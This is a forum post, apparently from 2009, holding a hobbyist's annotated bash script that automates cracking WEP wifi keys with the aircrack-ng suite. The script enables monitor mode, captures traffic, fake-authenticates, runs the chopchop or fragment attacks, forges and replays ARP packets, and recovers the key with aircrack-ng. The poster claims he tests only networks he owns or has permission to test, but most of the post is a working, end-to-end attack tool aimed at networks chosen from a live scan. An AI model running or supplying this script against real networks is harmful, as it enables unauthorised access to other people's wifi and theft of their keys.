I have a hobby of breaking into wifi networks (only ones I own or have explicit, written permission to test, of course!), so I made this script to get a little practice in scripting.
So far I have dumped all the necessary commands for the WEP cracking process. Needs a little cleaning up!
It also assumes you're in the directory you want to dump all the files. Maybe could add a 'rm' as a clean-up?
This is only my third script so some stuff I have not got around to learning.
I would like some help finding a way to run some of the commands in new terminals or shells. This has to be done: airodump-ng, the fake authentication and the ARP replay all run until they are killed, so in a single shell the script blocks on each of them, and pressing Ctrl-C to stop one also fires the script's SIGINT trap, which runs clean_up and exits.
Also, I need to make the 'for' loop (highlighted by "###") run each of the variable assignment commands for each of the searched networks found. I'll get there, but maybe someone has a good way?
Any other help would be appreciated!
I apologize for the mess!
--- EDIT --- 22.08.09--------------------
updated the script into something a little more workable. Still in progress as I haven't tested it fully yet, only segments.
The netlist_auto method is VERY inefficient and needs more work: it re-runs iwlist six times per network, half of those against a hard-coded wlan0 instead of the chosen device, and it never asks which network to use, so whichever cell is listed last ends up as the target.
Still need advice for running processes in external shells (ideally in a split Terminator terminal!)
--------------------
Code:
#!/bin/bash
#
# --------------------
# Script to create an easy WEP cracking process
# --------------------
# Created by Adam 19.08.09
# --------------------
#
# --------------------
# VARIABLES
# --------------------
#
# Runtime state shared by the functions below. Everything is filled in
# interactively (or by the network scan); only the display counter has a value.
wifi_device=""          # interface to put into monitor mode; asked for at start
source_address=""       # MAC of $wifi_device, read from the system once it is known
source_device=""        # monitor-mode interface name, asked for after airmon-ng
target_address=""       # BSSID of the chosen network
target_channel=""       # channel of the chosen network
target_essid=""         # ESSID of the chosen network
networks_count=""       # how many cells the scan found
net_choice=""           # menu selection: manual or auto network listing
choice=""               # menu selection: chopchop or fragment
capture_files=""        # airodump-ng --write prefix
packetforge_packet=""   # packetforge-ng output name (without the .cap suffix)
cleanup_answer=""       # y/n answer to the final clean-up prompt
i=1                     # running number shown next to each listed network
# --------------------
# FUNCTIONS
# --------------------
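function clean_up() {
  # Trap handler (SIGHUP/SIGTERM/SIGINT) and the "y" answer at the end: remove
  # the files this run created in the current directory, then exit.
  # The original only printed the message and removed nothing. Only names
  # derived from this script's own variables are removed, never the recovered
  # key file, and each variable is checked for being set so an interrupt before
  # the prompts does not expand to a bare "-*.cap" and delete unrelated files.
  echo "Script terminated. Cleaning created files"
  if [ -n "$capture_files" ]; then
    # airodump-ng --write <prefix> creates <prefix>-NN.cap plus .csv/.kismet.* side files
    rm -f -- "$capture_files"-*.cap "$capture_files"-*.csv "$capture_files"-*.kismet.*
  fi
  if [ -n "$packetforge_packet" ]; then
    rm -f -- "$packetforge_packet".cap
  fi
  # keystream files written by the chopchop/fragment attacks; the script already
  # consumes whatever *.xor is in this directory, so it owns them
  rm -f -- ./*.xor
  exit 0
}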
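function netlist_manual() {
  # Show the raw `iwlist` scan in a pager, then have the user type the target's
  # address, ESSID and channel into the globals the attack steps read.
  # NOTE(review): on many drivers an unprivileged iwlist scan only returns the
  # cached list (or "Operation not permitted"); if the pager is empty, rerun as root.
  echo "Choose the WEP target (ADDRESS, CHANNEL and ESSID)"
  read -r -p "(Enter to continue...)"
  # print the network list in LESS reader
  iwlist "$wifi_device" scanning | less
  # -r keeps backslashes in the typed values literal (an ESSID may contain one)
  read -r -p "Enter the ADDRESS > " target_address
  read -r -p "Enter the ESSID > " target_essid
  read -r -p "Enter the CHANNEL > " target_channel
}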
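# Parse `iwlist <dev> scanning` output on stdin into one tab-separated line per
# cell: ADDRESS<TAB>CHANNEL<TAB>ESSID<TAB>KIND. Fields are matched by keyword
# rather than by line position, because the order and number of lines per cell
# differ between drivers. KIND is "open", "WPA" or "WEP?".
# NOTE(review): iwlist announces WPA/WPA2 with "IE: ..." lines, while WEP shows
# only "Encryption key:on" with no IE, so "WEP?" is an inference — confirm the
# ENC column in airodump-ng before attacking.
_parse_iwlist() {
  awk '
    function emit() {
      if (addr == "") return
      if (chan == "") chan = "?"
      if (essid == "") essid = "<hidden>"
      kind = "open"
      if (enc == "on") kind = (wpa ? "WPA" : "WEP?")
      printf "%s\t%s\t%s\t%s\n", addr, chan, essid, kind
    }
    # "Cell 01 - Address: 00:11:22:33:44:55" -> the MAC is the 5th field
    /Cell [0-9]+ - Address:/ { emit(); addr = $5; chan = ""; essid = ""; enc = ""; wpa = 0 }
    /^[ \t]*Channel:/ { sub(/.*Channel:/, ""); gsub(/[ \t]/, ""); chan = $0 }
    # some drivers only give "Frequency:2.437 GHz (Channel 6)"
    /Frequency:.*\(Channel [0-9]+\)/ && chan == "" { match($0, /Channel [0-9]+/); chan = substr($0, RSTART + 8, RLENGTH - 8) }
    /^[ \t]*ESSID:/ { sub(/.*ESSID:/, ""); sub(/^"/, ""); sub(/"[ \t]*$/, ""); essid = $0 }
    /Encryption key:/ { sub(/.*Encryption key:/, ""); gsub(/[ \t]/, ""); enc = $0 }
    /IE:.*WPA/ { wpa = 1 }
    END { emit() }
  '
}

# Scan once, list every cell, and make the user pick the target by number.
#   $1 (optional) a file holding saved `iwlist ... scanning` output, for offline
#      use or testing; without it $wifi_device is scanned live, exactly once.
# Sets: networks_count, target_address, target_channel, target_essid.
# Returns non-zero (with the target globals untouched) when the scan fails,
# finds nothing, or stdin ends before a valid number is entered.
function netlist_auto() {
  local scan_file=$1 own_scan=0
  local -a addrs=() chans=() essids=() kinds=()
  local addr chan essid kind n pick
  if [ -z "$scan_file" ]; then
    scan_file=$(mktemp) || return 1
    own_scan=1
    # one scan, parsed once: the old loop re-ran iwlist six times per network,
    # and against a hard-coded wlan0 rather than $wifi_device
    if ! iwlist "$wifi_device" scanning > "$scan_file" 2>&1; then
      echo "Scan of $wifi_device failed:" >&2
      cat -- "$scan_file" >&2
      rm -f -- "$scan_file"
      return 1
    fi
  fi
  while IFS=$'\t' read -r addr chan essid kind; do
    addrs+=("$addr")
    chans+=("$chan")
    essids+=("$essid")
    kinds+=("$kind")
  done < <(_parse_iwlist < "$scan_file")
  if [ "$own_scan" = 1 ]; then
    rm -f -- "$scan_file"
  fi
  networks_count=${#addrs[@]}
  clear
  echo "$networks_count networks found"
  echo ""
  if [ "$networks_count" -eq 0 ]; then
    echo "Nothing to choose from; try the manual method." >&2
    return 1
  fi
  for (( n = 0; n < networks_count; n++ )); do
    echo "Network #$((n + 1))"
    echo "--------------------"
    echo "Address: ${addrs[n]}"
    echo "ESSID: ${essids[n]}"
    echo "Channel: ${chans[n]}"
    echo "Encryption: ${kinds[n]}"
    echo ""
  done
  # The old loop left target_* pointing at whichever cell happened to be listed
  # last, so the attack would have run against an arbitrary network. Insist on
  # an explicit pick and reject anything outside 1..networks_count.
  while :; do
    read -r -p "Enter the number of the WEP target > " pick || return 1
    if [[ $pick =~ ^[0-9]+$ ]] && [ "$pick" -ge 1 ] && [ "$pick" -le "$networks_count" ]; then
      break
    fi
    echo "Not a valid choice!"
  done
  n=$((pick - 1))
  target_address=${addrs[n]}
  target_channel=${chans[n]}
  target_essid=${essids[n]}
  if [ "${kinds[n]}" != "WEP?" ]; then
    echo "Warning: ${essids[n]} does not look like a WEP network (${kinds[n]}); the WEP attacks below will not work on it." >&2
  fi
}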
# --------------------
# MAIN
# --------------------
#
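# Process IDs of the tools this script leaves running (airodump-ng, fake auth,
# ARP replay); stopped by stop_background.
bg_pids=()

# Kill every background tool started via run_in_window.
stop_background() {
  local pid
  for pid in "${bg_pids[@]}"; do
    kill "$pid" 2>/dev/null
  done
}

# Signal handler: stop the tools first, then let clean_up remove files and exit.
terminate() {
  stop_background
  clean_up
}
trap terminate SIGHUP SIGTERM SIGINT

# Run a tool that only ends when killed, without blocking this script. With a
# display and xterm available it gets its own window (the "other window" the
# comments below asked for); otherwise it is backgrounded with its output in
# ./<tag>.log and stdin detached, so a job that polls the keyboard is not
# suspended by SIGTTIN. The PID is recorded for stop_background.
#   $1    short tag used for the window title / log name
#   $2..  the command line to run
run_in_window() {
  local tag=$1
  shift
  if [ -n "$DISPLAY" ] && command -v xterm >/dev/null 2>&1; then
    xterm -T "$tag" -e "$@" &
  else
    echo "(no display: $tag runs in the background, output in ./$tag.log)"
    "$@" > "$tag.log" 2>&1 < /dev/null &
  fi
  bg_pids+=("$!")
}

# Abort with a message on stderr, stopping anything already launched.
die() {
  echo "$*" >&2
  stop_background
  exit 1
}

#mkdir ~/temp_caps/
# enter my wifi device
clear
echo "This is a script to crack a WEP encrypted network with very little input"
echo "--------------------"
# Every tool below runs under sudo. Authenticate once now so the ones started
# with stdin detached never have to prompt for a password.
sudo -v || exit 1
read -r -p "Enter your WIFI device > " wifi_device
[ -d "/sys/class/net/$wifi_device" ] || die "No such interface: $wifi_device"
# obtain my MAC address. sysfs is authoritative; the old ifconfig/HWaddr parse
# comes up empty on net-tools versions that print "ether ..." instead, which
# would have handed aireplay-ng an empty -h. ifconfig is kept only as a fallback.
source_address=$(cat "/sys/class/net/$wifi_device/address" 2>/dev/null)
[ -n "$source_address" ] || source_address=$(ifconfig "$wifi_device" | awk '/HWaddr/ {print $5}')
[ -n "$source_address" ] || die "Could not read the MAC address of $wifi_device"
echo "MAC Address being used: $source_address"
sleep 2
while [ -z "$net_choice" ]; do
  echo "Choose method for displaying networks:"
  echo " 1) manual input method"
  echo " 2) auto-choice method (broken)"
  echo ""
  read -r -p "Enter you choice > " net_choice
  case $net_choice in
    1 )
      netlist_manual
      ;;
    2 )
      # back to the menu if the scan produced nothing to choose from
      netlist_auto || { sleep 2; net_choice=; clear; }
      ;;
    * ) echo "Not a valid choice!"
      sleep 2
      net_choice=
      clear
      ;;
  esac
done
# The target fields go straight onto root-level command lines below; a typo
# would otherwise be accepted silently and the attack run against nothing.
[[ $target_address =~ ^([0-9A-Fa-f]{2}:){5}[0-9A-Fa-f]{2}$ ]] || die "Not a MAC address: '$target_address'"
[[ $target_channel =~ ^[0-9]+$ ]] || die "Not a channel number: '$target_channel'"
# start the wifi device in MONITOR MODE and obtain the NEW DEVICE
sudo airmon-ng start "$wifi_device" "$target_channel"
read -r -p "Enter the new monitor-enabled interface > " source_device
[ -d "/sys/class/net/$source_device" ] || die "No such interface: $source_device"
# capture the packets and IV's using AIRODUMP-NG. It runs until killed, so it
# goes into its own window / the background and the script carries on.
echo "Starting airodump-ng to capture the packets needed..."
read -r -p "Specify the name of the capture file > " capture_files
[ -n "$capture_files" ] || die "The capture file name must not be empty"
run_in_window airodump sudo airodump-ng -c "$target_channel" --bssid "$target_address" --write "$capture_files" "$source_device"
# use AIREPLAY-NG for FAKE AUTHENTICATION
# will continue to send keep-alive requests (-q 5), incase the target refreshes (DHCP)
echo "Fake authenticating with target using aireplay-ng..."
sleep 2
run_in_window fakeauth sudo aireplay-ng --fakeauth 1 -q 5 -e "$target_essid" -a "$target_address" -h "$source_address" "$source_device"
################################
# choose between the CHOP-CHOP or FRAGMENT method for building packets.
# Both attacks ask "use this packet?" interactively, so they stay in the foreground.
while [ -z "$choice" ]; do
  echo "need to build an ARP packet. Please choose either the 'chopchop' or 'fragment' method... "
  read -r -p "Enter you choice > " choice
  case $choice in
    chopchop ) # brute force an ARP packet from CHOP-CHOP
      echo "please follow the instructions..."
      sudo aireplay-ng --chopchop -e "$target_essid" -a "$target_address" -h "$source_address" "$source_device"
      ;;
    fragment ) # send FRAGMENTED packet to target, returning nesissary data
      echo "please follow the instructions..."
      sudo aireplay-ng --fragment -e "$target_essid" -a "$target_address" -h "$source_address" "$source_device"
      ;;
    * ) echo "Not a valid choice"
      echo ""
      choice=
      ;;
  esac
done
################################
# packetforge-ng takes exactly one keystream file; the bare *.xor used before
# would pass every .xor in the directory. Use the newest one.
xor_file=
for f in *.xor; do
  [ -e "$f" ] || continue
  if [ -z "$xor_file" ] || [ "$f" -nt "$xor_file" ]; then
    xor_file=$f
  fi
done
[ -n "$xor_file" ] || die "No .xor keystream file was produced, cannot build the packet"
echo "Using packetforge-ng to create the new packet..."
read -r -p "Enter the filename for the newly built packet > " packetforge_packet
[ -n "$packetforge_packet" ] || die "The packet file name must not be empty"
sudo packetforge-ng -0 -y "$xor_file" -a "$target_address" -h "$source_address" -k 255.255.255.255 -l 255.255.255.255 -w "${packetforge_packet}.cap"
# using AIREPLAY-NG to generate IV's. Attack 3 is --arpreplay ("--arpreplay-ng"
# is not an option aireplay-ng knows). It injects until killed, so it runs
# alongside aircrack-ng instead of in front of it.
echo "Using aireplay-ng to bombard target and generate IV's..."
run_in_window arpreplay sudo aireplay-ng --arpreplay -e "$target_essid" -a "$target_address" -h "$source_address" -r "${packetforge_packet}.cap" "$source_device"
# using AIRCRACK-NG to release the passkey. airodump-ng names its captures
# <prefix>-NN.cap in the current directory (the old ~/<prefix>.* matched
# nothing), -b pins the network and -l writes the recovered key to that file.
echo "Going to crack the passkey with aircrack-ng..."
# the first capture file only appears once airodump-ng has written some frames
for (( w = 0; w < 30; w++ )); do
  compgen -G "${capture_files}-*.cap" >/dev/null && break
  sleep 1
done
sudo aircrack-ng -b "$target_address" -l "${capture_files}.key" "${capture_files}"-*.cap
stop_background
clear
echo "Key-file is in the current directory: ${capture_files}.key"
while [ -z "$cleanup_answer" ]; do
  read -r -p "Would you like to remove all other files, packets and captures [y/n]? > " cleanup_answer
  case $cleanup_answer in
    y)
      echo "Cleaning up..."
      clean_up
      ;;
    n)
      echo "leaving files alone... N chosen"
      ;;
    *)
      echo "Not a valid choice.."
      sleep 2
      clear
      cleanup_answer=
      ;;
  esac
done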